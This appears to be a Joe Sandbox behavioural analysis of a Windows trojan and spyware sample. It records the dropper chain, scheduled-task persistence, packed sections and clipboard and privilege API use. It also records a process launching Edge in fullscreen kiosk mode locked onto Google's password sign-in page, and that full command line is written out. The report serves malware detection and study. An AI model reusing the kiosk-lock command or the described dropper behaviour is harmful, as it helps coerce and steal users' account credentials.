Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.5:49787 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe

Code function: 8_2_0084EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

8_2_0084EAFF

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe

Code function: 8_2_0084ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

8_2_0084ED6A

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe

8_2_0084EAFF

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe

Code function: 8_2_0083AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

8_2_0083AA57

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe

Code function: 8_2_00869576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

8_2_00869576

System Summary

Binary is likely a compiled AutoIt script file

Source: ca798c703b.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: ca798c703b.exe, 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_e46c7b44-a
Source: ca798c703b.exe, 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_8c7914d6-1
Source: ca798c703b.exe.4.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_b4a81e9b-0
Source: ca798c703b.exe.4.dr	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_6e3538dd-b
Source: random[1].exe0.4.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_f88928b3-5
Source: random[1].exe0.4.dr	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_a10941ea-5

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:
Source: random[1].exe.4.dr	Static PE information: section name:
Source: random[1].exe.4.dr	Static PE information: section name: .rsrc
Source: random[1].exe.4.dr	Static PE information: section name: .idata
Source: random[1].exe.4.dr	Static PE information: section name:
Source: 44affe150c.exe.4.dr	Static PE information: section name:
Source: 44affe150c.exe.4.dr	Static PE information: section name: .rsrc
Source: 44affe150c.exe.4.dr	Static PE information: section name: .idata
Source: 44affe150c.exe.4.dr	Static PE information: section name:
Source: 4bea71e542.exe.4.dr	Static PE information: section name:
Source: 4bea71e542.exe.4.dr	Static PE information: section name: .rsrc
Source: 4bea71e542.exe.4.dr	Static PE information: section name: .idata
Source: 4bea71e542.exe.4.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe

Code function: 8_2_0083D5EB: CreateFileW,DeviceIoControl,CloseHandle,

8_2_0083D5EB

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe

Code function: 8_2_00831201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

8_2_00831201

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe

Code function: 8_2_0083E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

8_2_0083E8F6

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\explorti.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 4_2_0013E440	4_2_0013E440
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 4_2_00173068	4_2_00173068
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 4_2_00134CF0	4_2_00134CF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 4_2_00167D83	4_2_00167D83
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 4_2_0017765B	4_2_0017765B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 4_2_00134AF0	4_2_00134AF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 4_2_00176F09	4_2_00176F09
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 4_2_00178720	4_2_00178720
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 4_2_0017777B	4_2_0017777B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 4_2_00172BD0	4_2_00172BD0
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_007D8060	8_2_007D8060
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_00842046	8_2_00842046
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_00838298	8_2_00838298
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_0080E4FF	8_2_0080E4FF
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_0080676B	8_2_0080676B
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_00864873	8_2_00864873
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_007DCAF0	8_2_007DCAF0
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_007FCAA0	8_2_007FCAA0
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_007ECC39	8_2_007ECC39
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_00806DD9	8_2_00806DD9
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_007EB119	8_2_007EB119
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_007D91C0	8_2_007D91C0
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_007F1394	8_2_007F1394
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_007F1706	8_2_007F1706
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_007F781B	8_2_007F781B
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_007E997D	8_2_007E997D
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_007D7920	8_2_007D7920
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_007F19B0	8_2_007F19B0
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_007F7A4A	8_2_007F7A4A
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_007F1C77	8_2_007F1C77
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_007F7CA7	8_2_007F7CA7
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_00809EEE	8_2_00809EEE
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_0085BE44	8_2_0085BE44
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_007F1F32	8_2_007F1F32

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe 4410CA8B0BB2EC305F4AFFF8DDB215B9ABF29475C37CCB54C725A87EEC23E582

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: String function: 007D9CB3 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: String function: 007EF9F2 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: String function: 007F0A30 appears 46 times

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: ZLIB complexity 0.9998505806010929
Source: file.exe	Static PE information: Section: mtwfurbd ZLIB complexity 0.9944268944545179
Source: explorti.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9998505806010929
Source: explorti.exe.0.dr	Static PE information: Section: mtwfurbd ZLIB complexity 0.9944268944545179
Source: random[1].exe.4.dr	Static PE information: Section: ylafldxq ZLIB complexity 0.9947574327422807
Source: 44affe150c.exe.4.dr	Static PE information: Section: ylafldxq ZLIB complexity 0.9947574327422807
Source: 4bea71e542.exe.4.dr	Static PE information: Section: ylafldxq ZLIB complexity 0.9947574327422807

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@83/333@18/17

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe

Code function: 8_2_008437B5 GetLastError,FormatMessageW,

8_2_008437B5

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_008310BF AdjustTokenPrivileges,CloseHandle,		8_2_008310BF
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_008316C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		8_2_008316C3

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe

Code function: 8_2_008451CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

8_2_008451CD

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe

Code function: 8_2_0085A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

8_2_0085A67C

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe

Code function: 8_2_0084648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

8_2_0084648E

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe

Code function: 8_2_007D42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

8_2_007D42A2

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

File created: C:\Users\user\AppData\Roaming\1000051000\

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Login Data.12.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: file.exe

Virustotal: Detection: 54%

Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 44affe150c.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 4bea71e542.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe "C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe "C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe "C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe"
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=2092,i,10167336133317156012,1155906441156818278,262144 --disable-features=TranslateUI /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=2064,i,18190485972433327417,11293936898013704625,262144 --disable-features=TranslateUI /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7172 --field-trial-handle=2064,i,18190485972433327417,11293936898013704625,262144 --disable-features=TranslateUI /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7216 --field-trial-handle=2064,i,18190485972433327417,11293936898013704625,262144 --disable-features=TranslateUI /prefetch:8
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3320 --field-trial-handle=3116,i,10217348870755346526,13765946174730048673,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=2128 --field-trial-handle=3116,i,10217348870755346526,13765946174730048673,262144 /prefetch:8
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2244 --field-trial-handle=2168,i,13363544191728312460,15783960305069897033,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=3576 --field-trial-handle=2168,i,13363544191728312460,15783960305069897033,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=3244 --field-trial-handle=2064,i,18190485972433327417,11293936898013704625,262144 --disable-features=TranslateUI /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe "C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe "C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe "C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
